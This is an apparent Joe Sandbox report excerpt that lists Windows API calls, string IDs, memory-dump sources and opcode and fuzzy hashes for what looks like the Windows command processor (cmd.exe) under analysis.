                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00032931
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00032998
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2411632146-3173542853
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,0002B7DB,0000000C,00000004,00000080,00000000), ref: 000205FF
                                                                                                                                                                                                                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 00020613
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00020663
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00020695
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 000206D3
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 000206FB
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00020717
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 0002E89D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 58404892-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003C62E
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003C656
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0003C6C7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0003C6E6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0003C72A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0003C747
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0003C76C
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0003C794
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 0003C7B3
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 0003C7C5
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ca9521f276d4c765b870faaaaed616350734dba4f5884ac1e07a762524366641
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5f8bd31a64121ac1277c0e0670ed5f66bc526dc5d9d7244ba2bf3a5e34645afb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca9521f276d4c765b870faaaaed616350734dba4f5884ac1e07a762524366641
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A25141B5A042596BEB61DAA5DC89EEFBBFCEB45344F0400A9E905E3141E734DE84CF21
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2081463915-3124875276
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bea7a14b2e8f09a7c07ae8c358669594d45ba7e0789e8a670e7a45c486a6880f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 94b2cbd4655cfaf5b3a3cd478579e31bde3e9a0d9125583df65a07eb49492364
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bea7a14b2e8f09a7c07ae8c358669594d45ba7e0789e8a670e7a45c486a6880f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41E7712043029AEB756B64E8697FF73E4EB97725B24052FE102860D1EFA6D4C4C713
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A70,000000FF,00000000,?,00000001,?,?,?,00025833,?, /D /c",?,?,?,00000000,?), ref: 00031271
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1832741078-366822981
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 19bc51a43b6f8788e2425b37ea312892c85846e62ce20b2506ebb53450cc94b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 630e46af9dde7b65f0b6333e45771d2103f2b7be7835e39abf21370abc92ad60
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19bc51a43b6f8788e2425b37ea312892c85846e62ce20b2506ebb53450cc94b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FA1F674704614FBCF25DF14E9859EE7BA9FB48391F208015F4068B691CB74DEA1CB81
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00050AF0,00002000,00000000,00000000,00000000,00000000), ref: 00017ED4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A62F: wcschr.MSVCRT ref: 0001A635
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00050AF0,00002000,?), ref: 00017F16
                                                                                                                                                                                                                                                                                                                                                                                                                          • _ultoa.MSVCRT ref: 0002AFC9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 0002AFDE
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 0002AFF3
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3538039442-3455788185
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 100f46786a585e87c3152edb0ae8f819a1123814bdbe65c65e19335b53a8fa94
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ef5b8af03792aee67420ebd2115b1087b946170fae5c56e0a6d8d30de321a4b5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 100f46786a585e87c3152edb0ae8f819a1123814bdbe65c65e19335b53a8fa94
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B641F571740315ABEB209BA4DC49FAF7BBDEB46741F200129F606DB1C0DA789D40C755
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcschr$_wcsicmpiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :.\$=,;$=,;+/[] "
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1913572127-843887632
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d072941eb4bfbb0295bc0fa6a5b897edc90cb56dc07fe07cc542aa30dded5dd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 559206920d12c0fadca74053c8bff259194d80de4e4bf8e4d8b01afe7b9bca66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d072941eb4bfbb0295bc0fa6a5b897edc90cb56dc07fe07cc542aa30dded5dd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65A1C130A042A59BDB74CB68E8C8BFE77B5BF45314F5402A9EC06A7291D770ADC1CB52
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019E8E: iswspace.MSVCRT ref: 00019E9E
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00035406
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0003541C
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0003544C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 0003546B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 0003547B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00035497
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0003549F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 000354B3
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 000354D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00035501
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00035557
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00035578
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4166807220-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 157d187936ba1e4652922d1e57af0f507bf68b9e81cf1bae857fca953cbcf28f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: efd43fac0bfb3c1fcc38fc2ba70ba8abfcc2fa79a46522c97a0d667c85f70734
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 157d187936ba1e4652922d1e57af0f507bf68b9e81cf1bae857fca953cbcf28f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE51D4316006189AEB66AB34DC197EA77FDFF01311F1085A9E486D21E1EF749EC1CBA1
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00017669
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00017670
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00017686
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0001768D
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00017719
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001772B
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00017758
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0002AA79
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 435930816-3086019870
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5efc3319142f6e98e32cc27a3c8e325f347324edca2bc129db573850a76a6468
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9178909a757fd9c75e6b2319d0c4645b4d89c21b47e1f371b8e27945607ae445
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5efc3319142f6e98e32cc27a3c8e325f347324edca2bc129db573850a76a6468
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC51247520C3019FE7249F38AD05AAB37E4EF4A315B14456EE906C7281FF29D881CB6B
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003AF04
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003AF2E
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003AF58
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,0001250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 0003B08B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 0003B095
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 0003B0AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0003B1DA
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0003B1F2
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0003B20A
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %04X-%04X
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2748242238-1126166780
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2ac32324d977eb3e4d130b2e0133f8ba2ade16aacb09d6682ea5062a51704fcd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 88a7bd08ce5ae7a201dae523ff016dadfa6204ef31cd83c37fe09735eeecaa22
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ac32324d977eb3e4d130b2e0133f8ba2ade16aacb09d6682ea5062a51704fcd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 109191B1A002299BDB65DA64CC95BEAB7FDEF14308F4405E9F609D3141EB349F848F91
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3458554142-1539845467
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 55268985c2aa4751148f4c39e1de50c94d3f16037663dc5dbf1dfbf48d7cad57
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d3af5bc8e934c3e4c9508d0374a42338144955cd9d446fd66f442a822befdac6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55268985c2aa4751148f4c39e1de50c94d3f16037663dc5dbf1dfbf48d7cad57
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E181A074A00226CBEB749F64DC457FA73F5AF10305F1448AAE98AA7241FB758DC4CB61
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00022431
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00022452
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002247C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,0001250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 00022585
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 000225A3
